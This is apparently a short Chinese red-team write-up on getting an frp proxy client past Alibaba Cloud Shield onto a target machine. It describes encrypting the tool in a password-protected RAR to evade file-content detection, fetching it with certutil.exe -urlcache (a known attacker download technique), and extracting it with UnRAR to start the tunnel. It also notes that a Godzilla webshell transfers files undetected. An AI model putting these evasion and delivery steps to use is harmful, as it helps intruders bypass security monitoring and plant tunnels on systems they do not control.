0x1

在一次项目中,往目标机器上传代理软件的时候被拦截了,大小和原有的大小严重不符合,一看task list有个阿里云盾,感觉是阿里云监测了文件,直接给我替换了部分内容。

最后想的办法是首先给文件加密,加个压缩包,打个密码,然后他就不可读文件,保证文件的一致性。

使用winrar添加一个压缩包,并且设置密码123456.

winrar有一个命令行参数的解压工具,为unrar.exe

UnRAR.exe -y x -p123456 "frpc_windows_amd64.rar" "C:\Users\Public"

-p为指定密码 然后解压到某个文件夹里面

image.png

测试正常以后使用certuti进行下载回来,因为发现直接用CS去传文件他也会给你替换压缩包内容,原因未知,不过用此下载的方法是没有问题的。

certutil.exe -urlcache -split -f http://www.baidu.com/index.html c:\users\public\x.html
image.png
image.png

好活,不杀了。

0x2

这下大小合适,也把工具传上去执行解压功能

image.png

UnRAR.exe -y x -p123456 "frpc_windows_amd64.rar" "C:\Users\Public"

image.png
image.png

frp不就起来了吗?

后记:阿里云盾可能利用了流量检测和文件内容检测,绕过技术有加密和certutil.exe,不过同事直接用哥斯拉webshell也可以正常传输文件。

UnRAR.exe